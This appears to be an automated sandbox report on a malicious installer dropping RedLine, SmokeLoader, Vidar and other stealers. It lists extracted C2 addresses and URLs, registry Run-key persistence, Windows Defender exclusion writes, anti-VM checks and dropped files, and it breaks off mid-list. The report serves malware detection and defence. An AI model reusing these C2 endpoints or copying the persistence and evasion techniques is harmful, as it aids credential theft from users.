Resubmissions
02-11-2021 06:54
211102-hpn1zsbhc2 1002-11-2021 06:42
211102-hgpmjsgggp 1001-11-2021 21:47
211101-1ncknsfgfm 10Analysis
-
max time kernel
4547s -
max time network
26861s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
01-11-2021 21:47
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
General
-
Target
setup_x86_x64_install.exe
-
Size
4.2MB
-
MD5
b5b5fe52ed9ca7d47bfb857498fd684c
-
SHA1
9c17089a630141c9b4e13ef46ab334d46709fdb8
-
SHA256
6cbb4380d880c6bab221c81122b32e225ebf224942191fb08df5df82f971864b
-
SHA512
482de7cacf73eb37050e323312b05d3d5d2152048efa5defa4b3d8687f6b3355233d8bf3f04d6107a7214f4b21e4f81f83313ecaf3bdcda98c7d95d60a41e79a
Malware Config
Extracted
redline
media0121
91.121.67.60:23325
Extracted
redline
newjust
135.181.129.119:4805
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Extracted
vidar
41.6
933
https://mas.to/@lilocc
-
profile_id
933
Signatures
-
Process spawned unexpected child process 7 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6644 388 rundll32.exe 150 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8060 388 rundll32.exe 150 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8240 388 rundll32.exe 150 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1200 388 rundll32.exe 150 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6308 388 rundll32.exe 150 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6368 388 rundll32.exe 150 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8296 388 rundll32.exe 150 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral6/memory/1164-266-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral6/memory/1164-267-0x0000000000418D26-mapping.dmp family_redline behavioral6/memory/2420-291-0x0000000000418D3A-mapping.dmp family_redline behavioral6/memory/2420-290-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral6/files/0x000400000001abae-149.dat family_socelars behavioral6/files/0x000400000001abae-180.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
description pid Process procid_target PID 4816 created 1652 4816 WerFault.exe 95 PID 4496 created 5284 4496 WerFault.exe 163 PID 4892 created 1520 4892 WerFault.exe 91 PID 5540 created 2392 5540 WerFault.exe 139 -
suricata: ET MALWARE ClipBanker Variant Activity (POST)
suricata: ET MALWARE ClipBanker Variant Activity (POST)
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE FormBook CnC Checkin (POST) M2
suricata: ET MALWARE FormBook CnC Checkin (POST) M2
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral6/memory/4704-481-0x0000000002210000-0x00000000022E6000-memory.dmp family_vidar behavioral6/memory/4704-484-0x0000000000400000-0x00000000004D9000-memory.dmp family_vidar -
resource yara_rule behavioral6/files/0x000400000001aba3-122.dat aspack_v212_v242 behavioral6/files/0x000400000001aba3-125.dat aspack_v212_v242 behavioral6/files/0x000400000001aba2-123.dat aspack_v212_v242 behavioral6/files/0x000400000001aba2-128.dat aspack_v212_v242 behavioral6/files/0x000400000001aba2-127.dat aspack_v212_v242 behavioral6/files/0x000600000001aba5-129.dat aspack_v212_v242 behavioral6/files/0x000600000001aba5-130.dat aspack_v212_v242 -
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run cscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ETHHFTBPMR4 = "C:\\Program Files (x86)\\X_r3\\ms9r_l_r.exe" cscript.exe -
Blocklisted process makes network request 64 IoCs
flow pid Process 255 4588 mshta.exe 256 4588 mshta.exe 257 4588 mshta.exe 260 4588 mshta.exe 271 4588 mshta.exe 272 4588 mshta.exe 273 4588 mshta.exe 274 4588 mshta.exe 306 5192 cmd.exe 475 6368 rundll32.exe 511 6368 rundll32.exe 520 6368 rundll32.exe 526 6368 rundll32.exe 526 6368 rundll32.exe 625 6368 rundll32.exe 511 6368 rundll32.exe 520 6368 rundll32.exe 693 6072 cscript.exe 704 6072 cscript.exe 708 8020 MsiExec.exe 711 8020 MsiExec.exe 712 8020 MsiExec.exe 713 8020 MsiExec.exe 714 8020 MsiExec.exe 715 8020 MsiExec.exe 716 8020 MsiExec.exe 717 8020 MsiExec.exe 718 8020 MsiExec.exe 719 8020 MsiExec.exe 720 8020 MsiExec.exe 721 8020 MsiExec.exe 722 8020 MsiExec.exe 723 8020 MsiExec.exe 727 8020 MsiExec.exe 729 8020 MsiExec.exe 730 8020 MsiExec.exe 731 8020 MsiExec.exe 732 8020 MsiExec.exe 733 8020 MsiExec.exe 734 8020 MsiExec.exe 735 8020 MsiExec.exe 736 8020 MsiExec.exe 737 8020 MsiExec.exe 738 8020 MsiExec.exe 739 8020 MsiExec.exe 740 8020 MsiExec.exe 741 8020 MsiExec.exe 742 8020 MsiExec.exe 743 8020 MsiExec.exe 744 8020 MsiExec.exe 747 8020 MsiExec.exe 749 8020 MsiExec.exe 751 8020 MsiExec.exe 752 8020 MsiExec.exe 753 8020 MsiExec.exe 754 8020 MsiExec.exe 755 8020 MsiExec.exe 756 8020 MsiExec.exe 757 8020 MsiExec.exe 758 8020 MsiExec.exe 759 8020 MsiExec.exe 760 8020 MsiExec.exe 761 8020 MsiExec.exe 762 8020 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts Conhost.exe -
Executes dropped EXE 64 IoCs
pid Process 700 setup_installer.exe 3852 setup_install.exe 944 Mon178e7a516181.exe 884 Mon179f74c0ff3cf1f.exe 1048 Mon17870faab0.exe 1520 Mon17bffc2992eb3d.exe 1908 Mon1727c156c4abcec.exe 2004 Mon175e6c8b40064b8c8.exe 3096 Mon173a360b525.exe 2104 Mon1727c156c4abcec.exe 2288 Mon17332e41e6b.exe 2724 Mon17bbf11fdb575d.exe 1560 Mon174a6c5f1664f.exe 1652 Mon1708beae021a5ff.exe 1552 Mon178d8e5d06822.exe 1060 Mon17bbf11fdb575d.tmp 2300 Mon17a0d8ec302e.exe 2924 Mon17afe24e0084db3.exe 3340 Mon17bbf11fdb575d.exe 3988 Mon17bbf11fdb575d.tmp 1908 mshta.exe 1164 Mon174a6c5f1664f.exe 2420 Mon1727c156c4abcec.exe 2868 5431899.exe 4120 671081.exe 4112 cmd.exe 4208 postback.exe 4380 520258.exe 4452 DownFlSetup110.exe 4568 inst1.exe 4636 7540508.exe 4704 Soft1WW01.exe 4796 chrome.exe 4880 5667762.exe 4968 chrome2.exe 5008 5824839.exe 2452 5952231.exe 3080 search_hyperfs_206.exe 2392 setup.exe 4604 Lesavaeshiky.exe 4844 Conhost.exe 4712 chrome3.exe 2432 6831137645.exe 516 KWw_Na9PoK6E2at8khQXjitr.exe 1560 Chrome5.exe 4700 N9N76vYxukkwQD1CI_UpvR65.exe 4696 WinHoster.exe 4588 mshta.exe 4524 O7nom3SDxJGlpV8eVKOY1Zzv.tmp 5128 110301.exe 5184 xR3OQ2Qh_z7R_Ve5A7amjTnU.exe 5192 cmd.exe 5200 pQnAbYmg3ChB2IJbQyaavv5U.exe 5208 any.exe 5216 W30vm3LUtOHOLL7zBnVYdAYg.exe 5228 zOSiw22fXWUlLyCSO8v9nq6z.exe 5168 cewNSWFaXogGyGjuphJS2DKK.exe 5176 AAsjqRognrs5OHbgENK9auj7.exe 5276 6Dc4QkJcH_bc6k4XPPf58CgI.exe 5284 UDl5MrZhovzJ9aalPEClXxwq.exe 5292 8t8B84uCRSWE3mwZuTRWxKhE.exe 5352 ROKEqOhVK1b69uHCUbon1CXS.exe 5368 taskkill.exe 5420 MQEVvxj7hZPEIbDsVozLP91D.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6Dc4QkJcH_bc6k4XPPf58CgI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8308170.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UDl5MrZhovzJ9aalPEClXxwq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cewNSWFaXogGyGjuphJS2DKK.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ROKEqOhVK1b69uHCUbon1CXS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion emLR1yBnJXWqQ4WeiAVEpVDR.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ROKEqOhVK1b69uHCUbon1CXS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8t8B84uCRSWE3mwZuTRWxKhE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 520258.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7540508.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7540508.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UDl5MrZhovzJ9aalPEClXxwq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6Dc4QkJcH_bc6k4XPPf58CgI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3258372.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8t8B84uCRSWE3mwZuTRWxKhE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8308170.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 520258.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cewNSWFaXogGyGjuphJS2DKK.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3258372.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion emLR1yBnJXWqQ4WeiAVEpVDR.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Lesavaeshiky.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Mon178e7a516181.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Mon179f74c0ff3cf1f.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation plnTHKl8cQG5waAHP2YJZuCW.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation UWZiUOJl0LZG66f2pahI0uWq.exe -
Loads dropped DLL 64 IoCs
pid Process 3852 setup_install.exe 3852 setup_install.exe 3852 setup_install.exe 3852 setup_install.exe 3852 setup_install.exe 3852 setup_install.exe 3852 setup_install.exe 3852 setup_install.exe 1060 Mon17bbf11fdb575d.tmp 3988 Mon17bbf11fdb575d.tmp 4844 Conhost.exe 4844 Conhost.exe 4844 Conhost.exe 4844 Conhost.exe 4844 Conhost.exe 5052 regsvr32.exe 7048 rundll32.exe 4724 setup.exe 4724 setup.exe 8092 rundll32.exe 7620 regsvr32.exe 7620 regsvr32.exe 2200 msiexec.exe 2200 msiexec.exe 3272 msiexec.exe 3272 msiexec.exe 6368 rundll32.exe 6368 rundll32.exe 4256 zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe 4256 zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe 4256 zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe 4256 zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe 4256 zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe 888 O7nom3SDxJGlpV8eVKOY1Zzv.tmp 6732 setup.exe 6732 setup.exe 4724 setup.exe 4724 setup.exe 4724 setup.exe 4524 O7nom3SDxJGlpV8eVKOY1Zzv.tmp 4724 setup.exe 6368 rundll32.exe 4844 Conhost.exe 6368 rundll32.exe 6368 rundll32.exe 5668 msiexec.exe 5668 msiexec.exe 5536 setup.exe 5536 setup.exe 7832 msiexec.exe 7832 msiexec.exe 6732 setup.exe 7880 installer.exe 7880 installer.exe 6732 setup.exe 1416 Calculator.exe 6732 setup.exe 1052 autosubplayer.exe 1416 Calculator.exe 1416 Calculator.exe 6732 setup.exe 4256 zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe 6532 autosubplayer.exe 5752 Calculator.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IuWtIecd = "0" rundll32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0" rundll32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IuWtIecd = "0" rundll32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0" rundll32.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --ZgwMku75" setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --ZgwMku75" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 5824839.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --ZgwMku75" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Xymyshywago.exe\"" DYbALA.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe -
Checks for any installed AV software in registry 1 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\SOFTWARE\KasperskyLab powershell.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rundll32.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ROKEqOhVK1b69uHCUbon1CXS.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8t8B84uCRSWE3mwZuTRWxKhE.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg1_1faf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cewNSWFaXogGyGjuphJS2DKK.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6Dc4QkJcH_bc6k4XPPf58CgI.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3258372.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA emLR1yBnJXWqQ4WeiAVEpVDR.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8308170.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 520258.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7540508.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA UDl5MrZhovzJ9aalPEClXxwq.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\U: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 15 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 60 ipinfo.io 196 freegeoip.app 202 freegeoip.app 361 ipinfo.io 362 ipinfo.io 58 ipinfo.io 170 ip-api.com 215 freegeoip.app 268 ipinfo.io 57 ipinfo.io 260 ipinfo.io 201 freegeoip.app 259 ipinfo.io 363 ipinfo.io 1838 ip-api.com -
Drops file in System32 directory 35 IoCs
description ioc Process File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 svchost.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 svchost.exe File opened for modification C:\Windows\System32\Tasks\services64 svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\Tasks\IuWtIecd svchost.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\Tasks\PowerControl LG svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\Tasks\PowerControl HR svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 7451613952F15FA8 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 23 IoCs
pid Process 4380 520258.exe 4636 7540508.exe 5168 cewNSWFaXogGyGjuphJS2DKK.exe 5276 6Dc4QkJcH_bc6k4XPPf58CgI.exe 5352 ROKEqOhVK1b69uHCUbon1CXS.exe 5636 3258372.exe 5900 emLR1yBnJXWqQ4WeiAVEpVDR.exe 5292 8t8B84uCRSWE3mwZuTRWxKhE.exe 6024 8308170.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe -
Suspicious use of SetThreadContext 13 IoCs
description pid Process procid_target PID 1560 set thread context of 1164 1560 Chrome5.exe 112 PID 2104 set thread context of 2420 2104 Mon1727c156c4abcec.exe 115 PID 1652 set thread context of 4424 1652 Mon1708beae021a5ff.exe 124 PID 5200 set thread context of 2580 5200 pQnAbYmg3ChB2IJbQyaavv5U.exe 31 PID 5284 set thread context of 5512 5284 UDl5MrZhovzJ9aalPEClXxwq.exe 193 PID 5376 set thread context of 2580 5376 BRFaifqDEarEZCox1Bk4206c.exe 31 PID 5184 set thread context of 3456 5184 xR3OQ2Qh_z7R_Ve5A7amjTnU.exe 226 PID 1240 set thread context of 5616 1240 wXD3LoKOrGHMg2o92T34f5b0.exe 230 PID 6072 set thread context of 2580 6072 cscript.exe 31 PID 2736 set thread context of 5300 2736 svchost.exe 255 PID 7040 set thread context of 5912 7040 lierne.exe 293 PID 9076 set thread context of 4804 9076 conhost.exe 489 PID 6072 set thread context of 4804 6072 cscript.exe 489 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\rockbox_fm_presets.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\dumpmeta.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libmod_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libudp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\sd\icecast.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsc_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\Video-48.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\IuWtIecd\cache.dat rundll32.exe File created C:\Program Files (x86)\lighteningplayer\libvlc.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\libvlccore.dll autosubplayer.exe File opened for modification 